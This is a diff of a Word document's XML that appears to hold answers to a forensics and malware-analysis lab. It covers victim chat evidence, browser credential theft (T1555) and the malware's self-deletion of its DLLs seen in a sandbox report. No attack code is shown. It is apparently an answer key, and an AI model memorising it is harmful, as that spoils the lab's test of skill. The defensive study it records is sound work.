-        <w:t xml:space="preserve">Dữ liệu trò chuyện được trích xuất có một cuộc trò chuyện liên quan đến nạn nhân và một liên hệ được xác định là "rob1ns0n." Trong cuộc trò chuyện này, ngày 20 tháng 9 năm 2023, lúc 20:46:02, "rob1ns0n" trả lời một tin nhắn trước đó về kế hoạch đi lại của nạn nhân. Họ xác nhận địa điểm gặp mặt là </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Mob</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Museum</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>và khuyến khích nạn nhân gọi điện khi đến nơi. Thông điệp trước đó cho biết nạn nhân đã đặt vé máy bay vào ngày 1 tháng 10 năm 2023, lúc 9:00 sáng. Điều này phù hợp với hiểu biết của thám tử rằng nạn nhân dự định đi du lịch sau khi ở khách sạn.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5052,10 +3368,10 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AA5BB4A" wp14:editId="3909304B">
-            <wp:extent cx="5943600" cy="2836545"/>
-            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
-            <wp:docPr id="884604195" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E8F8EF5" wp14:editId="33689F47">
+            <wp:extent cx="5943600" cy="2765425"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1247633420" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5063,11 +3379,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="884604195" name=""/>
+                    <pic:cNvPr id="1247633420" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId14"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5075,7 +3391,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2836545"/>
+                      <a:ext cx="5943600" cy="2765425"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -5087,6 +3403,1308 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="44"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Trong chi tiết quy trình, chúng ta có thể thấy phần mềm độc hại sử dụng kỹ thuật T1555, được biết đến với tên gọi "Lấy thông tin đăng nhập từ các kho lưu trữ mật khẩu." Kỹ thuật này liên quan đến việc kẻ tấn công nhắm vào các vị trí lưu trữ mật khẩu phổ biến, chẳng hạn như trình duyệt </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>web</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>, để đánh cắp thông tin đăng nhập. Bằng cách trích xuất các thông tin đăng nhập được lưu trong trình duyệt hoặc công cụ quản lý mật khẩu, kẻ tấn công có thể truy cập vào các tài khoản và hệ thống nhạy cảm của người dùng.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q6</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>By</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>examining</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>child</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>processes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>displayed</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in the </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:history="1">
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>Any.run</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>sandbox</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>report</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>which</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>directory</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>does</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>deletion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>all</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>DLL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>files</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="45"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Nhìn vào cây tiến trình, chúng ta thấy rằng tiến trình </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> này được sinh ra dưới tiến trình </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sẽ tạm dừng trong 5 giây rồi xóa </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> cùng bất kỳ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>dll</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> nào có thể đã được tải trong quá trình thực thi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="172D4EBE" wp14:editId="438FAB46">
+            <wp:extent cx="5943600" cy="2858135"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1039815145" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1039815145" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2858135"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Understanding</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
